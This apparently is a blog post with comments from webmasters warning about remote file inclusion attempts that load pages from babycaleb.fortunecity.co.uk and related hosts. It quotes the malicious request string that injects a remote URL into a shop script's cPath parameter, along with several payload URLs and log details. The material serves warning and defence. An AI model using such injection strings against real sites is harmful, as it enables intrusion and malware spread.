Am getting a lot of these request lately
/shop/catalog/product_info.php?cPath=http://babycaleb.fortunecity.co.uk/index.htm
They are from lots of IPS all trying to remote load this page. Inside that page is a hack atempt. AVG gives an alarm if you try to view the source.
Do not go to the website babycaleb.fortunecity.co.uk AVG detects a virus but it still gets into your system. Look for ..
c:\windows\system32\tools\regexe.exe
a trojan horse downloader.generic8.cox
--updated-
The site has now been shutdown.
A search of google
http://www.google.com/search?q=babycaleb.fortunecity.co.uk shows that sites all over the net are infected with this atack and they are allowing the atack to spread. Perhaps they are involved in the atack?
Subscribe to:
Post Comments (Atom)
9 comments:
I am admin for cooking.com we have been under attack with this babycaleb.fortunecity.co.uk for three days now. Wish Fortunecity would get off their asses and kill it.
I have had around three dozen hacking attempts per week from babycaleb since he set up on fortunecity.
FortuneCity support will not take action.
This is the third hosting company he has worked through (since I have been aware of him) the first two companies actually shut him down. FortuneCity seems unwilling to help.
As webmaster of several websites, I've noticed attacks attempts from many babycaleb websites, their number's increasing with time.
Amongst them I've recently noticed :
http://babycaleb.fortunecity.co.uk (even today)
http://calebsbirth.fortunecity.co.uk/
http://babycaleb.mvhosted.com
http://mybabycaleb.chat.ru
What a plea !
It was active on Nov 23
I can show at least 65 examples of times this URL hack has been passed to my website(s).
There are many more.... even with no "babycaleb" in the querystring but on the page, for example:
http://myfamily.yoll.net/index.htm
It is very annoying!
Parsing input: http://myfamily.yoll.net/index.htm
Host myfamily.yoll.net (checking ip) = 216.65.1.200
host 216.65.1.200 (getting name) = fateback.com.
Routing details for 216.65.1.200
Report routing for 216.65.1.200: abuse@dedicatedhosting.com, abuse@interland.com
What I can't understand is why this hacker can't show some nice ladies instead of his ugly bad looking gal :p
Not sure whether its the same but I have a search cloud on my site that has picked up this fortune city query nad another failry soon after with similar intent.
http://beerincooler.chat.ru/image.jpg
IP:58.0.158.143
SYSTEM: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Date,Time: Thu 25th Mar,2010 08:53 am
until Thu 25th Mar,2010 08:57 am 30 times.
Post a Comment